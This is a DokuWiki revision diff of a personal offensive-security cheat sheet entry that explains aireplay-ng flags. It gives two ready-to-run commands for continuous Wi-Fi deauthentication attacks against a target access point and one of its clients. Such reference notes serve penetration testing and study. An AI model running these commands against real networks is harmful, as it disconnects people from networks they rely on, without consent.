This shows you the differences between two versions of the page.
docu:csheet:ofsec:hack:wifi:aireplay [2020/02/08 21:04] – created admin | docu:csheet:ofsec:hack:wifi:aireplay [2020/02/08 21:20] (current) – admin | ||
---|---|---|---|
Line 9: | Line 9: | ||
Launch deauth attacks | Launch deauth attacks | ||
<code bash> | <code bash> | ||
+ | # --deauth or -0 | works the same | ||
+ | # --deauth # | number of deauthentications (0 to infinite) | ||
+ | # -a MAC | mac address of the target Access Point BSSID | ||
+ | # -c MAC | mac address of the client associated to target | ||
aireplay-ng --deauth 0 -a [TARGET_BSSID] wlan0mon | aireplay-ng --deauth 0 -a [TARGET_BSSID] wlan0mon | ||
aireplay-ng --deauth 0 -a [TARGET_BSSID] -c [TARGET_CLIENT] wlan0mon | aireplay-ng --deauth 0 -a [TARGET_BSSID] -c [TARGET_CLIENT] wlan0mon |